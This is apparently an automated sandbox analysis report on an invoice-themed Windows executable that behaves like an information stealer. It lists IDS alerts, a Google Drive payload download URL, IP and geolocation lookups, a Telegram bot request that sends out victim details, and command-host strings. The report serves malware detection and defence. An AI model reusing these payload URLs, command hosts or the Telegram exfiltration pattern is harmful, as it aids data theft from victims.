Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49729 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 142.250.185.174:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Factura Honorarios 2024-11-17.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20a
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.000000003610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036107000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/4
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/d
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005963000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663661029.00000000073F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2193651298.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=downloadD
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036009000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036009000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.000000003613E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

0_2_0040542B

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403359
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_00403359

Creates files inside the system directory

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

File created: C:\Windows\resources\0809

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00404C68	0_2_00404C68
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_0040698E	0_2_0040698E
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_6FF41B63	0_2_6FF41B63
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00404C68	3_2_00404C68
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0040698E	3_2_0040698E
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015C19B	3_2_0015C19B
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015D278	3_2_0015D278
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00155362	3_2_00155362
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015C468	3_2_0015C468
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015C738	3_2_0015C738
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015E988	3_2_0015E988
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_001569A0	3_2_001569A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_001529E0	3_2_001529E0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015CA08	3_2_0015CA08
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015CCD8	3_2_0015CCD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00159DE0	3_2_00159DE0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015CFAC	3_2_0015CFAC
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00156FC8	3_2_00156FC8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015F974	3_2_0015F974
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015E97C	3_2_0015E97C
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00153E09	3_2_00153E09
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8FC68	3_2_38F8FC68
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F85028	3_2_38F85028
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F82968	3_2_38F82968
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F81E80	3_2_38F81E80
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8E258	3_2_38F8E258
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F817A0	3_2_38F817A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F89328	3_2_38F89328
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8D0F8	3_2_38F8D0F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8CCA0	3_2_38F8CCA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8CC8F	3_2_38F8CC8F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F80040	3_2_38F80040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F85020	3_2_38F85020
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F89C18	3_2_38F89C18
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F80019	3_2_38F80019
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8F810	3_2_38F8F810
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8DDF1	3_2_38F8DDF1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8D9A8	3_2_38F8D9A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8D999	3_2_38F8D999
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8D550	3_2_38F8D550
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F89548	3_2_38F89548
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8E6B0	3_2_38F8E6B0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8E6A0	3_2_38F8E6A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F81E70	3_2_38F81E70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8E257	3_2_38F8E257
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8E24D	3_2_38F8E24D
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8DE00	3_2_38F8DE00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8F3B8	3_2_38F8F3B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F88BA0	3_2_38F88BA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F88B91	3_2_38F88B91
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8178F	3_2_38F8178F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8EF60	3_2_38F8EF60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F80B30	3_2_38F80B30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F80B20	3_2_38F80B20
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8EB08	3_2_38F8EB08
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391781D0	3_2_391781D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391738B8	3_2_391738B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39177720	3_2_39177720
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39177B78	3_2_39177B78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39178FB0	3_2_39178FB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917A938	3_2_3917A938
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917E538	3_2_3917E538
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917A928	3_2_3917A928
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917C558	3_2_3917C558
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917E548	3_2_3917E548
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39170D48	3_2_39170D48
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917C548	3_2_3917C548
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39171190	3_2_39171190
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917119F	3_2_3917119F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391711A0	3_2_391711A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917E9D8	3_2_3917E9D8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917C9D8	3_2_3917C9D8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917E9C8	3_2_3917E9C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391715F7	3_2_391715F7
